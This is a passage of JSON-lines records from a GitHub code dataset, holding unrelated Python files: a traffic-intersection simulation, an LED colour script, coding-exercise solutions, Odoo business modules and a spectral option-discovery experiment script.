preprocess.processing_module import get_coordinates, calculate_trajectory, get_lane, vehicles_laneID\nfrom preprocess.lane_technical_information import get_dict_lane_info\nfrom preprocess.sensor_technical_information import get_dict_sensor_info\nfrom simulation.length_per_laneID import get_length_all_lanes\nfrom common import open_xml, get_available_intersections, clear_cars_movements\nfrom const import cars_data_location, intersection_data_location, car_length\nimport os\nimport csv\nimport glob\nimport names\nfrom alive_progress import alive_bar\n\n\ndef run_simulation(begin_time: int, end_time: int) -> None:\n clear_cars_movements()\n\n lanes, signals, inductioncoils = load_lanes_signals_and_inductioncoils()\n worlds_array = []\n worlds_dict = {}\n car_merges = {}\n to_update = []\n\n def add_world(addworld: World, index=None) -> World:\n \"\"\"\n Adds the world to the worlds_array and worlds_dict,\n if there is already world at that runtime, it merges them\n \"\"\"\n if addworld.runtime in worlds_dict:\n existing_world: World = worlds_dict[addworld.runtime]\n existing_world.merge_world_into(addworld, car_merges)\n return existing_world\n else:\n worlds_array.insert(index if index is not None else len(worlds_array), addworld)\n worlds_dict[addworld.runtime] = addworld\n return addworld\n\n # Initialize worlds with car spawn points\n with open(os.path.join('preprocess', 'output', 'spawn_points.csv')) as csvfile:\n reader = csv.reader(csvfile, delimiter=';')\n next(reader, None)\n for i, row in enumerate(reader):\n time = int(row[0])\n if time >= begin_time:\n if time <= end_time:\n car = Car(str(i), Location(lanes[row[1]], float(row[2])), car_length, 8.3)\n car_merges[car.id] = car.id\n world = World([car], lanes, signals, inductioncoils, time)\n add_world(world)\n else:\n break\n print('Loaded spawn points, now simulating')\n\n # Main simulation loop\n to_update.append(worlds_array[0])\n while to_update:\n update_world = to_update.pop(0)\n print(f\"{begin_time} - {update_world.runtime} - {end_time}\", end='\\r')\n next_world = update_world.next_world(100)\n next_world = add_world(next_world, worlds_array.index(update_world) + 1)\n if begin_time < next_world.runtime < end_time:\n to_update.append(next_world)\n print('Simulation done, now exporting')\n\n # Export to csv's\n\n # Don't know why this happens but this should fix it\n for fix_key, fix_value in [(k, car_merges[v]) for k, v in car_merges.items() if car_merges[v] != v]:\n car_merges[fix_key] = fix_value\n unique_cars = tuple(set(car_merges.values()))\n export_paths = {i: os.path.join(cars_data_location, f'sim_car_{i}.csv') for i in unique_cars}\n for filepath in export_paths.values():\n with open(filepath, 'w') as file:\n writer = csv.writer(file, delimiter=';', lineterminator='\\n')\n writer.writerow(('time', 'latitude', 'longitude'))\n for world in worlds_array:\n print(f\"{world.runtime} / {worlds_array[-1].runtime}\", end='\\r')\n for car in world.cars.values():\n with open(export_paths[car_merges[car.id]], 'a') as file:\n file.write(';'.join(map(str, (world.runtime, *car.location.to_geo())))+'\\n')\n print('Exported, done!')\n\n\ndef get_lane_objects(vehicles_lanes, lane_indcoil_signal, root, filename) -> dict:\n \"\"\"\n Return a list containing defined Lane objects of all the vehicle lanes in specified filename\n\n For our simulation, we will be focusing on the lane that is intended for a vehicle.\n \"\"\"\n lane_objects = {} # dict containing the Lane Objects\n\n for id in vehicles_lanes.keys(): # iterate through each lane\n\n # Defining Signal object of lane\n if id.zfill(2) in lane_indcoil_signal.keys() and lane_indcoil_signal[id.zfill(2)][\n 'traffic_light'] != '': # check if laneID of lane in dict and if lane contains any traffic lights\n signal_id = lane_indcoil_signal[id.zfill(2)]['traffic_light'] # get the signal_id\n\n signal = Signal(signal_id) # define Signal object\n else:\n signal = None\n\n coordinaten = get_coordinates(root, vehicles_lanes[id], 'ingress') # [::-1] # get the coordinates of lane\n\n # Define Lane object based on the type of the lane.\n # An ingresslane contains the necessary coordinates of an trajectory. \n # We can directly define an trajectory Lane object and an ingress Lane object. \n if vehicles_lanes[id][3][0].text == '10': # ingress\n linked_egresslane = vehicles_lanes[id][5][0][0][0].text\n laneid = filename + \"_\" + id\n # laneid = id\n lane_objects[laneid] = Lane(laneid, coordinaten[::-1], 'ingress', signal) # add to dict\n\n # Define the instance variable for a Lane object of a trajectory\n lane_ing = get_lane(root, id)\n traj_id = filename + \"_\" + id + '-' + linked_egresslane # define the id\n # traj_id = id + '-' + linked_egresslane # define the id\n traj_coordinates = get_coordinates(root, lane_ing, 'trajectory') # get coordinates of trajectory\n\n lane_objects[traj_id] = Lane(traj_id, traj_coordinates,\n 'trajectory') # define Lane object and add it to lane_objects\n\n else: # egress\n laneid = filename + \"_\" + id\n # laneid = id\n lane_objects[laneid] = Lane(laneid, coordinaten, 'egress', signal)\n\n \n for lane in lane_objects:\n if \"-\" in lane:\n temp = lane.split('-') # bos210_1-26 -> bos210_1, 26->bos210_26\n\n ingress_lane = lane_objects.get(temp[0])\n traject_lane = lane_objects.get(lane)\n egress_lane = lane_objects.get(filename + '_' + temp[1])\n\n ingress_lane.connectedlane(traject_lane)\n traject_lane.connectedlane(egress_lane)\n return lane_objects\n\n\ndef get_signal_objects(dict_signals) -> dict:\n # print(dict_signals)\n 'Get a list of all the Signals'\n signals = {}\n for _, j in dict_signals.items():\n if j['traffic_light'] != '':\n signals[j['traffic_light']] = Signal(j['traffic_light'])\n return signals\n\n\ndef get_inductioncoils(sensors_all_lanes, lane_objects) -> dict:\n ' define a list of InductionCoils objects'\n\n inductioncoils = {} # list of all the inductioncoils of all the lanes\n\n for lane in lane_objects.values(): # iterate through each lane\n if lane.getTypeLane() != 'trajectory':\n id = lane.getID().split('_')[1] # bos210_1 -> get 1\n if bool(sensors_all_lanes[id]['sensors']): # check if lane contains inductionscoils\n\n # iterate through inductionloops\n for sensorID in sensors_all_lanes[id]['sensors'].keys():\n centerposition = sensors_all_lanes[id]['sensors'][sensorID][\n 'position'] # get the centerlocation/ Sensorposition\n sensor_length = sensors_all_lanes[id]['sensors'][sensorID]['length'] # get the length\n\n # Define InductionCoil\n centerposition = tuple(map(lambda x: int(x) / 10000000, centerposition))\n distance = lane.coordinate_to_meters(centerposition)\n centerlocation = Location(lane, distance)\n induction_coil = InductionCoil(sensorID, centerlocation, float(sensor_length) / 100)\n\n # Add to list inductioncoils\n inductioncoils[sensorID] = induction_coil\n \n\n return inductioncoils\n\n\ndef load_lanes_signals_and_inductioncoils() -> (dict, dict, dict):\n layout_paths = get_available_intersections() # example: ['BOS210', 'BOS211']\n\n lanes = {}\n signals = {}\n inductioncoils = {}\n for filename in layout_paths:\n\n root = open_xml(filename)\n # Define the necessary dictionaries that will be used to define our class objects\n vehicles_lanes = vehicles_laneID(\n root) # Get the laneID en genericlane of all lane that is specific for vehicles\n lane_indcoil_signal = get_dict_lane_info(\n filename) # dictionary of the induction loops and trafficlights of all lanes\n lanes_length = get_length_all_lanes(filename) # dictionary of the length of all lanes\n sensors_all_lanes = get_dict_sensor_info(filename)\n # return lane objects, signals inductioncoils\n\n # Define the Lane objects\n lanes = get_lane_objects(vehicles_lanes, lane_indcoil_signal, root, filename)\n\n # Define the Signal objects\n signals = get_signal_objects(lane_indcoil_signal)\n for signal in signals:\n signals[signal].setIntersection(filename)\n # Define the InductionCoil objects\n inductioncoils = get_inductioncoils(sensors_all_lanes, lanes)\n for inductioncoil in inductioncoils:\n inductioncoils[inductioncoil].setIntersection(filename)\n\n lanes.update(lanes)\n signals.update(signals)\n inductioncoils.update(inductioncoils)\n\n pathlst = []\n for intersection in get_available_intersections():\n path = os.path.join(intersection_data_location, intersection, \"compressed\", \"compressed.csv\")\n pathlst.append(path)\n # print(pathlst)\n signalMg = SignalManager(pathlst)\n for signal in signals:\n signals.get(signal).setSignalManager(signalMg) # Cant check if this works yet\n #print(signals.get(signal).getState(1610492290820))\n #print(\"the signal id's are: \",signals.get(signal).id)\n\n for inductioncoil in inductioncoils:\n inductioncoils.get(inductioncoil).setSignalManager(signalMg) # Cant check if this works yet\n\n for lane in lanes:\n #print(lanes.get(lane).id)\n continue\n\n return (lanes, signals, inductioncoils)\n\n","repo_name":"Lucas-vdr-Horst/VIS-group-C","sub_path":"simulation/run_simulation.py","file_name":"run_simulation.py","file_ext":"py","file_size_in_byte":10442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71312810027","text":"import unicornhat as uh\nimport time\nimport random\nuh.set_layout(uh.PHAT)\nuh.brightness(0.5)\nuh.set_layout(uh.AUTO)\nuh.rotation(0)\nuh.brightness(0.5)\nwidth,height=uh.get_shape()\n#colors = [1, 128, 244] # set colors all to 1\ncolors = [random.randint(3, 240), random.randint(3, 240), random.randint(3, 240), ] # selects random start color in \"safe zone\"\n#steps = [1, 3, 4] # set wavelength\nsteps = [random.randint(1, 2), random.randint(1, 2), random.randint(1, 2)] # selects random step beteween 1 and 5\nprint(\"INIT\") ## REPL\ndef getColor(index, colors, steps):\n if colors[index] >= 255 or colors[index] <= 0: # flip the sign of the step at the max/min\n steps[index] *= -1\n colors[index] += steps[index] # increment the value\n if colors[index] > 255: colors[index] = 255 # accounting for stepping over 255\n if colors[index] < 0: colors[index] = 0 # accounting for stepping under 0\n return (colors[index], colors, steps) # returns colors for index\n\nwhile True:\n r, colors, steps = getColor(0, colors, steps) # gets red\n g, colors, steps = getColor(1, colors, steps) # gets green\n b, colors, steps = getColor(2, colors, steps) # gets blue\n print(\"STEP = \", steps, \"COLOR = \", colors) # REPL debug print\n uh.clear()\n uh.set_all(r, g, b) # calls setPixel\n uh.show()\n time.sleep(random.random()) # random wait time between 0 and 1\n","repo_name":"ab-gh/trinket","sub_path":"random_color_phat.py","file_name":"random_color_phat.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9955290167","text":"n, m = [int(value) for value in input().split(\" \")]\ncheckItems = [value for value in input().split(\" \")]\n\ntotalN = 0\ntotalM = 0\nfor i in range(n):\n items = [value for value in input().split(\" \")]\n flag = True\n output = \"\"\n itemLength = len(items)\n for j in range(1, itemLength):\n for k in range(m):\n if items[j] == checkItems[k]:\n if flag:\n output = output + items[0] + \": \"\n flag = False\n\n output = output + items[j] + \" \"\n totalM += 1\n\n if len(output) > 0:\n totalN += 1\n print(output.rstrip())\n\nprint(str(totalN) + \" \" + str(totalM))\n","repo_name":"wangcaitao/pat","sub_path":"pat-python/basic-level/1072.py","file_name":"1072.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26327606479","text":"import re\r\nfrom collections import defaultdict\r\nimport collections\r\n\r\n# Point = collections.namedtuple('Point',['x','y'])\r\n#\r\n# directions = {\r\n# (+1, +0): 'e',\r\n# (+1, -1): 'ne',\r\n# (+0, -1): 'n',\r\n# (-1, -1): 'nw',\r\n# (-1, +0): 'w',\r\n# (-1, +1): 'sw',\r\n# (+0, +1): 's',\r\n# (+1, +1): 'se',\r\n# }\r\n#\r\n# def direction(x1, y1, x2, y2):\r\n# direc = {\r\n# (+1, +0): 'e',\r\n# (+1, -1): 'ne',\r\n# (+0, -1): 'n',\r\n# (-1, -1): 'nw',\r\n# (-1, +0): 'w',\r\n# (-1, +1): 'sw',\r\n# (+0, +1): 's',\r\n# (+1, +1): 'se',\r\n# }\r\n#\r\n# dx = x2 - x1\r\n# dy = y2 - y1\r\n# dx = dx/abs(dx) if dx != 0 else 0\r\n# dy = dy/abs(dx) if dy != 0 else 0\r\n# return directions[(dx, dy)]\r\n#\r\n# class Line:\r\n# def __init__(self, x1, y1, x2, y2):\r\n# self.p1 = Point(x1, y1)\r\n# self.p2 = Point(x2, y2)\r\n# dx = x2 - x1\r\n# dy = y2 - y1\r\n# self.dx = dx / abs(dx) if dx != 0 else 0\r\n# self.dy = dy / abs(dx) if dy != 0 else 0\r\n# self.length = max(abs(dx), abs(dy))\r\n#\r\n# def intersects(self, x, y):\r\n# if self.direction == 'horizontal':\r\n# return y == self.p1.y and self.p1.x <= x <= self.p2.x\r\n\r\nif __name__ == \"__main__\":\r\n pattern = re.compile(r\"(\\d+),(\\d+) -> (\\d+),(\\d+)\")\r\n\r\n with open('input.txt', 'r') as input_file:\r\n lines = [line.strip() for line in input_file.readlines() if len(line) > 1]\r\n\r\n lines = [[int(i) for i in pattern.match(line).groups()] for line in lines]\r\n lines = [l for l in lines if\r\n l[0] == l[2] or\r\n l[1] == l[3] or\r\n abs(l[2]-l[0]) == abs(l[3]-l[1])\r\n ]\r\n\r\n containing_lines = defaultdict(lambda: [])\r\n\r\n for l_i, line in enumerate(lines):\r\n dx = line[2] - line[0]\r\n dy = line[3] - line[1]\r\n length = max(abs(dx), abs(dy))\r\n dx = dx / abs(dx) if dx else 0\r\n dy = dy / abs(dy) if dy else 0\r\n dx, dy = int(dx), int(dy)\r\n for p_i in range(int(length) + 1):\r\n containing_lines[(\r\n line[0] + p_i * dx,\r\n line[1] + p_i * dy\r\n )].append(l_i)\r\n\r\n overlaps = [key for key, value in containing_lines.items() if len(value) > 1]\r\n print(len(overlaps))\r\n\r\n # for x in range(1000):\r\n # for y in range(1000):\r\n # c = len(containing_lines[(y,x)])\r\n # print(c if c else \" \", end=\" \")\r\n # print(\"\")\r\n\r\n\r\n\r\n","repo_name":"LLinville/misc_code","sub_path":"advent2021/5/day5b-2.py","file_name":"day5b-2.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29500284097","text":"f = open('Week2IntegerArray.txt')\nl = []\nfor line in f:\n x = line.strip()\n l.append(int(x))\n\n\n\ndef inversions(items):\n n = len(items)\n if n <= 1:\n return items, 0\n\n # number of inversions in partitions\n left, linv = inversions(items[:n // 2])\n right, rinv = inversions(items[n // 2:])\n\n inv = linv + rinv\n llen, rlen = len(left), len(right)\n i, j, aux = 0, 0, []\n\n # merge and count inversions\n for k in range(n):\n if i < llen and j < rlen and left[i] > right[j]:\n inv += llen - i\n aux.append(right[j])\n j += 1\n elif i < llen:\n aux.append(left[i])\n i += 1\n else:\n aux.append(right[j])\n j += 1\n\n return aux, inv\n\nprint(len(l))\naux, inv = inversions(l)\nprint(inv)\n\n'''\n%timeit inversions(l)\n440 ms ± 2.86 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)\n'''","repo_name":"KillTheHeart00000/Coursera_Algorithms-Specialization_Stanford","sub_path":"Course1/Week2_Counting Inversions/Week2_1_CountingInversions.py","file_name":"Week2_1_CountingInversions.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21222594416","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\nclass distributionService(models.Model):\n _name = 'distribution.service'\n\n distribution_on = fields.Selection([('quantity', 'Quantity'), ('weight', 'Weight'), ('length', 'Length')], string='Distribution On')\n product_id = fields.Many2one('product.product', string='Service Charge')\n quantity = fields.Float(string='Quantity', digits='New Cortex Precision')\n price_unit = fields.Float(string='Unit Price', digits='Product Price')\n product_uom_id = fields.Many2one('uom.uom', string='Unit of Measure', default=lambda self: self.env.ref('uom.product_uom_unit'))\n subtotal = fields.Float(string='Subtotal', compute='compute_subtotal',digits='New Cortex Product Precision')\n batch_production_id = fields.Many2one('batch.production', string='Batch Production', ondelete='cascade')\n\n @api.depends('quantity', 'price_unit')\n def compute_subtotal(self):\n for record in self:\n record.subtotal = record.quantity * record.price_unit\n \n @api.onchange('product_id')\n def onchange_product(self):\n if self.product_id:\n self.product_uom_id = self.product_id.uom_id.id\n self.price_unit = self.product_id.standard_price\n","repo_name":"Cortex4103/Cortex2","sub_path":"cortex_na/models/distribution_service.py","file_name":"distribution_service.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5334857402","text":"from configs import get_common_args\nfrom learners import laprepr, spectral_cluster, option_map_constructor, offline_planner\nfrom utils import timer_tools\nfrom envs.simple_rl.tasks import PinballMDP\nfrom utils import episodic_replay_buffer\nimport os\nimport torch\nimport time\n\ndef main():\n timer = timer_tools.Timer()\n args = get_common_args()\n temp_time = time.strftime('%Y_%m_%d_%H_%M_%S', time.localtime(time.time()))\n args.model_dir = args.model_dir + '/' + temp_time\n args.log_dir = args.log_dir + '/' + temp_time\n\n if torch.cuda.is_available() and args.cuda:\n args.device = torch.device('cuda')\n if args.gpu is not None:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu\n else:\n args.device = torch.device('cpu')\n print('device: {}.'.format(args.device))\n\n if args.env_id == 'Pinball':\n cases = {'medium':{'cfg': \"pinball_medium.cfg\", 'start': [(0.2, 0.9), (0.2, 0.5), (0.9, 0.9), (0.9, 0.5), (0.3, 0.3), (0.9, 0.1), (0.5, 0.1),\n (0.05, 0.05), (0.2, 0.05), (0.35, 0.65), (0.5, 0.3), (0.5, 0.45), (0.45, 0.6)],\n 'task_list': [[(0.2, 0.5), (0.9, 0.1)], [(0.9, 0.5), (0.45, 0.6)], [(0.9, 0.5), (0.35, 0.65)], [(0.2, 0.9), (0.5, 0.1)]]}}\n env = PinballMDP(render=args.render, episode_length=1000, reward_scale=1000., cfg=cases['medium']['cfg'], start_points=cases['medium']['start'],\n task_list=cases['medium']['task_list'])\n else:\n raise NotImplementedError\n\n env_info = env.get_env_info()\n args.obs_dim = env_info['obs_dim']\n args.obs_pos_dim = env_info['obs_pos_dim']\n args.act_dim = env_info['act_dim']\n\n # learn the eigenfunctions\n replay_buffer = episodic_replay_buffer.EpisodicReplayBuffer(max_size=args.lap_replay_buffer_size) # shared\n learner = laprepr.LapReprLearner(args, env, replay_buffer)\n learner.train()\n # spectral clustering with the learned estimations\n sc_agent = spectral_cluster.SpectralCluster(args, learner, replay_buffer)\n centers, sub_goals = sc_agent.clustering() # centers: list of States, sub_goals: dict\n # option construction with the newly found landmarks\n oc_agent = option_map_constructor.OptionConstructor(env, args, centers, sub_goals, learner)\n oc_agent.build_topo_map()\n # offline planning based on the topological map\n op_agent = offline_planner.OfflinePlanner(args, env, oc_agent, sc_agent, learner)\n op_agent.planning(task_list=env.get_task_list())\n print('Total time cost: {:.4g}s.'.format(timer.time_cost()))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"LucasCJYSDL/Deep-Spectral-Option-Discovery","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9964008459","text":"import time\nimport datetime\n\nfrom openerp.osv import fields, osv\nfrom openerp import pooler\nfrom openerp import tools\nfrom openerp.tools.translate import _\nimport openerp.addons.decimal_precision as dp\n\nclass project_project(osv.osv):\n\t_inherit = 'project.project'\n\n\t_columns = {\n\t\t'is_work_order': fields.boolean('Work Order'),\n\t\t'work_order_ids': fields.one2many('project.work.order', 'project_id', \"Work Order Progress\"),\n\t}\n\n\t# def open_timesheets(self, cr, uid, ids, context=None):\n\t# \t\"\"\" open Timesheets view \"\"\"\n\t# \tmod_obj = self.pool.get('ir.model.data')\n\t# \tact_obj = self.pool.get('ir.actions.act_window')\n\n\t# \tproject = self.browse(cr, uid, ids[0], context)\n\t# \tview_context = {\n\t# \t\t'search_default_account_id': [project.analytic_account_id.id],\n\t# \t\t'default_account_id': project.analytic_account_id.id,\n\t# \t}\n\t# \thelp = _(\"\"\"

Record your timesheets for the project '%s'.

\"\"\") % (project.name,)\n\t# \ttry:\n\t# \t\tif project.to_invoice and project.partner_id:\n\t# \t\t\thelp+= _(\"\"\"

Timesheets on this project may be invoiced to %s, according to the terms defined in the contract.

\"\"\" ) % (project.partner_id.name,)\n\t# \texcept:\n\t# \t\t# if the user do not have access rights on the partner\n\t# \t\tpass\n\n\t# \tres = mod_obj.get_object_reference(cr, uid, 'hr_timesheet', 'act_hr_timesheet_line_evry1_all_form')\n\t# \tid = res and res[1] or False\n\t# \tresult = act_obj.read(cr, uid, [id], context=context)[0]\n\t# \tresult['name'] = _('Timesheets')\n\t# \tresult['context'] = view_context\n\t# \tresult['help'] = help\n\t# \treturn result\n\nproject_project()\n\nclass project_work_order(osv.osv):\n\tdef _get_amount_subtotal(self, cr, uid, ids, field_name, arg, context=None):\n\t\tcur_obj = self.pool.get('res.currency')\n\t\tres = {}\n\t\tif context is None:\n\t\t\tcontext = {}\n\t\tfor line in self.browse(cr, uid, ids, context=context):\n\t\t\tsubtotal = line.quantity * line.unit_price\n\t\t\tres[line.id] = subtotal\n\t\treturn res\n\n\tdef _progress_payment_rate(self, cr, uid, ids, names, arg, context=None):\n\t\tif context is None:\n\t\t\tcontext = {}\n\t\tres = {}\n\t\tfor wo in self.browse(cr, uid, ids, context=context):\n\t\t\tif wo.amount_subtotal:\n\t\t\t\tpaid_amount = sum([line.price_unit for line in wo.invoice_line_ids])\n\t\t\t\tprogress = round((paid_amount/wo.amount_subtotal)*100.0,2) \n\t\t\telse:\n\t\t\t\tprogress = 0.0\n\t\t\tres[wo.id] = progress\n\t\treturn res\n\n\t_name = \"project.work.order\"\t\n\t_columns={\n\t\t'project_id': fields.many2one('project.project', 'Project Ref', ondelete='cascade', required=True, select=\"1\"),\n\t\t'name': fields.char('Work summary', size=128),\n\t\t'date': fields.date('Date', select=\"1\"),\n\t\t'company_id': fields.related('project_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),\n\t\t'product_id' : fields.many2one('product.product', 'Product', domain=[('type','=','service')], required=True),\n\t\t'quantity' : fields.float('Quantity', digits_compute= dp.get_precision('Account')),\n\t\t'uom_id' : fields.many2one('product.uom', 'UoS'),\n\t\t'unit_price' : fields.float('Price Unit', digits_compute= dp.get_precision('Account')),\n\t\t'amount_subtotal' : fields.function(_get_amount_subtotal, type='float', digits_compute= dp.get_precision('Account'), string='Amount Subtotal'),\n\t\t'invoice_line_ids' : fields.one2many('account.invoice.line', 'work_order_id', 'Invoice Lines'),\n\t\t'progress_payment_rate': fields.function(_progress_payment_rate, string='Progress Payment', type='float', help=\"Percent of Work Order's payment closed according to the total of outstanding amount to pay\",\n\t\t\tstore = {\n\t\t\t\t'project.work.order': (lambda self,cr,uid,ids,context={}:ids, ['invoice_line_ids','unit_price','quantity'], 10),\n\t\t\t}),\n\t}\n\n\t_defaults = {\n\t\t'date': lambda *a: time.strftime('%Y-%m-%d'),\n\t}\n\t\nproject_work_order()\n\nclass project_task(osv.osv):\n\t_inherit = \"project.task\"\n\n\t# def get_user_related_details(self, cr, uid, user_id):\n\t# \tres = {}\n\t# \temp_obj = self.pool.get('hr.employee')\n\t# \temp_id = emp_obj.search(cr, uid, [('user_id', '=', user_id)])\n\t# \tif not emp_id:\n\t# \t\tuser_name = self.pool.get('res.users').read(cr, uid, [user_id], ['name'])[0]['name']\n\t# \t\traise osv.except_osv(_('Bad Configuration!'),\n\t# \t\t\t _('Please define employee for user \"%s\". You must create one.')% (user_name,))\n\t# \temp = emp_obj.browse(cr, uid, emp_id[0])\n\t# \tif not emp.product_id:\n\t# \t\traise osv.except_osv(_('Bad Configuration!'),\n\t# \t\t\t _('Please define product and product category property account on the related employee.\\nFill in the HR Settings tab of the employee form.'))\n\n\t# \tif not emp.journal_id:\n\t# \t\traise osv.except_osv(_('Bad Configuration!'),\n\t# \t\t\t _('Please define journal on the related employee.\\nFill in the timesheet tab of the employee form.'))\n\n\t# \tacc_id = emp.product_id.property_account_expense.id\n\t# \tif not acc_id:\n\t# \t\tacc_id = emp.product_id.categ_id.property_account_expense_categ.id\n\t# \t\tif not acc_id:\n\t# \t\t\traise osv.except_osv(_('Bad Configuration!'),\n\t# \t\t\t\t\t_('Please define product and product category property account on the related employee.\\nFill in the timesheet tab of the employee form.'))\n\n\t# \tres['product_id'] = emp.product_id.id\n\t# \tres['journal_id'] = emp.journal_id.id\n\t# \tres['general_account_id'] = acc_id\n\t# \tres['product_uom_id'] = emp.product_id.uom_id.id\n\t# \treturn res\n\n\tdef create(self, cr, uid, vals, *args, **kwargs):\n\t\t# timesheet_obj = self.pool.get('hr.analytic.timesheet')\n\t\twork_order_obj = self.pool.get('project.work.order')\n\t\t# task_obj = self.pool.get('project.task')\n\t\tproject_obj = self.pool.get('project.project')\n\t\tuom_obj = self.pool.get('product.uom')\n\t\tproduct_obj = self.pool.get('product.product')\n\n\t\tvals_line = {} #parameters for work order\n\t\tcontext = kwargs.get('context', {})\n\t\tif not context.get('no_analytic_entry',False):\n\t\t\t# task_obj = task_obj.browse(cr, uid, vals['task_id'])\n\t\t\tproject_obj = project_obj.browse(cr, uid, vals['project_id'])\n\t\t\tvals_line['project_id'] = project_obj.id\n\t\t\t# result = self.get_user_related_details(cr, uid, vals.get('user_id', uid))\n\t\t\tvals_line['name'] = '%s: %s' % (tools.ustr(project_obj.name), tools.ustr(vals['name'] or '/'))\n\t\t\t# vals_line['user_id'] = vals['user_id']\n\n\t\t\tproduct_ids = product_obj.search(cr, uid, [('type','=','service')])\n\t\t\tif product_ids:\n\t\t\t\tproduct = product_obj.browse(cr, uid, product_ids[0])\n\t\t\t\tvals_line['product_id'] = product.id\n\t\t\t\tvals_line['uom_id'] = product.uom_id.id\n\t\t\telse:\n\t\t\t\traise osv.except_osv(_('Bad Configuration!'),\n\t\t\t\t\t_('Please define product and product category of Service Product in your Product Masters'))\n\t\t\t# vals_line['date'] = vals['date'][:10]\n\n\t\t\tvals_line['unit_price'] = 0.0\n\t\t\tvals_line['quantity'] = 1.0\n\t\t\t\n\t\t\t# acc_id = task_obj.project_id and task_obj.project_id.analytic_account_id.id or False\n\t\t\tif project_obj.is_work_order:\n\t\t\t\t# vals_line['account_id'] = acc_id\n\t\t\t\t# res = timesheet_obj.on_change_account_id(cr, uid, False, acc_id)\n\t\t\t\t# if res.get('value'):\n\t\t\t\t# \tvals_line.update(res['value'])\n\t\t\t\t# vals_line['general_account_id'] = result['general_account_id']\n\t\t\t\t# vals_line['journal_id'] = result['journal_id']\n\t\t\t\t# vals_line['amount'] = 0.0\n\t\t\t\t# vals_line['product_uom_id'] = result['product_uom_id']\n\t\t\t\t# amount = vals_line['unit_amount']\n\t\t\t\t# prod_id = vals_line['product_id']\n\t\t\t\t# unit = False\n\t\t\t\t# timeline_id = timesheet_obj.create(cr, uid, vals=vals_line, context=context)\n\t\t\t\twork_order_id = work_order_obj.create(cr, uid, vals=vals_line, context=context)\n\n\t\t\t\t# Compute based on pricetype\n\t\t\t\t# amount_unit = timesheet_obj.on_change_unit_amount(cr, uid, timeline_id,\n\t\t\t\t# \tprod_id, amount, False, unit, vals_line['journal_id'], context=context)\n\t\t\t\t# if amount_unit and 'amount' in amount_unit.get('value',{}):\n\t\t\t\t# \tupdv = { 'amount': amount_unit['value']['amount'] }\n\t\t\t\t# \ttimesheet_obj.write(cr, uid, [timeline_id], updv, context=context)\n\t\t\t\tvals['work_order_id'] = work_order_id\n\t\treturn super(project_task,self).create(cr, uid, vals, *args, **kwargs)\n\n\tdef write(self, cr, uid, ids, vals, context=None):\n\t\t\"\"\"\n\t\tWhen a project task work gets updated, handle its hr analytic timesheet.\n\t\t\"\"\"\n\t\tif context is None:\n\t\t\tcontext = {}\n\t\t# timesheet_obj = self.pool.get('hr.analytic.timesheet')\n\t\twork_order_obj = self.pool.get('project.work.order')\n\t\tuom_obj = self.pool.get('product.uom')\n\t\tproduct_obj = self.pool.get('product.product')\n\t\tresult = {}\n\n\t\tif isinstance(ids, (long, int)):\n\t\t\tids = [ids]\n\n\t\tfor task in self.browse(cr, uid, ids, context=context):\n\t\t\tline_id = task.work_order_id\n\t\t\tif not line_id:\n\t\t\t\t# if a record is deleted from timesheet, the line_id will become\n\t\t\t\t# null because of the foreign key on-delete=set null\n\t\t\t\tcontinue\n\n\t\t\tvals_line = {}\n\t\t\tif 'name' in vals:\n\t\t\t\tvals_line['name'] = '%s: %s' % (tools.ustr(task.task_id.name), tools.ustr(vals['name'] or '/'))\n\t\t\t# if 'user_id' in vals:\n\t\t\t# \tvals_line['user_id'] = vals['user_id']\n\t\t\t# if 'date' in vals:\n\t\t\t# \tvals_line['date'] = vals['date'][:10]\n\t\t\t# if 'hours' in vals:\n\t\t\t# \tvals_line['unit_amount'] = vals['hours']\n\t\t\t# \tprod_id = vals_line.get('product_id', line_id.product_id.id) # False may be set\n\n\t\t\t# \t# Put user related details in analytic timesheet values\n\t\t\t# \tdetails = self.get_user_related_details(cr, uid, vals.get('user_id', task.user_id.id))\n\t\t\t# \tfor field in ('product_id', 'general_account_id', 'journal_id', 'product_uom_id'):\n\t\t\t# \t\tif details.get(field, False):\n\t\t\t# \t\t\tvals_line[field] = details[field]\n\n\t\t\t# \t# Check if user's default UOM differs from product's UOM\n\t\t\t# \tuser_default_uom_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.project_time_mode_id.id\n\t\t\t# \tif details.get('product_uom_id', False) and details['product_uom_id'] != user_default_uom_id:\n\t\t\t# \t\tvals_line['unit_amount'] = uom_obj._compute_qty(cr, uid, user_default_uom_id, vals['hours'], details['product_uom_id'])\n\n\t\t\t# \t# Compute based on pricetype\n\t\t\t# \tamount_unit = timesheet_obj.on_change_unit_amount(cr, uid, line_id.id,\n\t\t\t# \t\tprod_id=prod_id, company_id=False,\n\t\t\t# \t\tunit_amount=vals_line['unit_amount'], unit=False, journal_id=vals_line['journal_id'], context=context)\n\n\t\t\t# \tif amount_unit and 'amount' in amount_unit.get('value',{}):\n\t\t\t# \t\tvals_line['amount'] = amount_unit['value']['amount']\n\n\t\t\tif vals_line:\n\t\t\t\twork_order_obj.write(cr, uid, [line_id.id], vals_line, context=context)\n\n\t\treturn super(project_task,self).write(cr, uid, ids, vals, context)\n\n\tdef unlink(self, cr, uid, ids, *args, **kwargs):\n\t\twork_order_obj = self.pool.get('project.work.order')\n\t\two_ids = []\n\t\tfor task in self.browse(cr, uid, ids):\n\t\t\tif 